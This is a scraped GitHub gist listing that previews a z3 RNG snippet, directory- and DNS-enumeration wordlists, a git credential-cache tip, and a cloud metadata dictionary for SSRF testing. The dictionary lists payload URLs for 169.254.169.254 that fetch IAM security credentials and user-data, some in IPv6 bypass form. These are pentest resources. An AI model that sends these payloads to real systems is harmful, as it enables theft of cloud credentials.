Skip to content

Instantly share code, notes, and snippets.

from z3 import *
class RNG:
def __init__(self, seed):
self.state = 0
for _ in range(16):
self.cur = seed & 3
seed >>= 2
self.state = (self.state << 4) | ((self.state & 3) ^ self.cur)
@kharaone
kharaone / content_discovery_all.txt
Created September 4, 2022 22:23 — forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_
@kharaone
kharaone / all.txt
Created September 4, 2022 22:23 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@kharaone
kharaone / cloud_metadata.txt
Created September 4, 2022 22:22 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@kharaone
kharaone / git_remember_password.md
Created December 14, 2017 18:22 — forked from ankurk91/git_remember_password.md
Git credential cache, why type password again and again

Git tip: Tired of entering password again and again ?

Run this command to remember your password:

git config --global credential.helper 'cache --timeout 28800'

Above command will tell git to cache your password for 8 hours.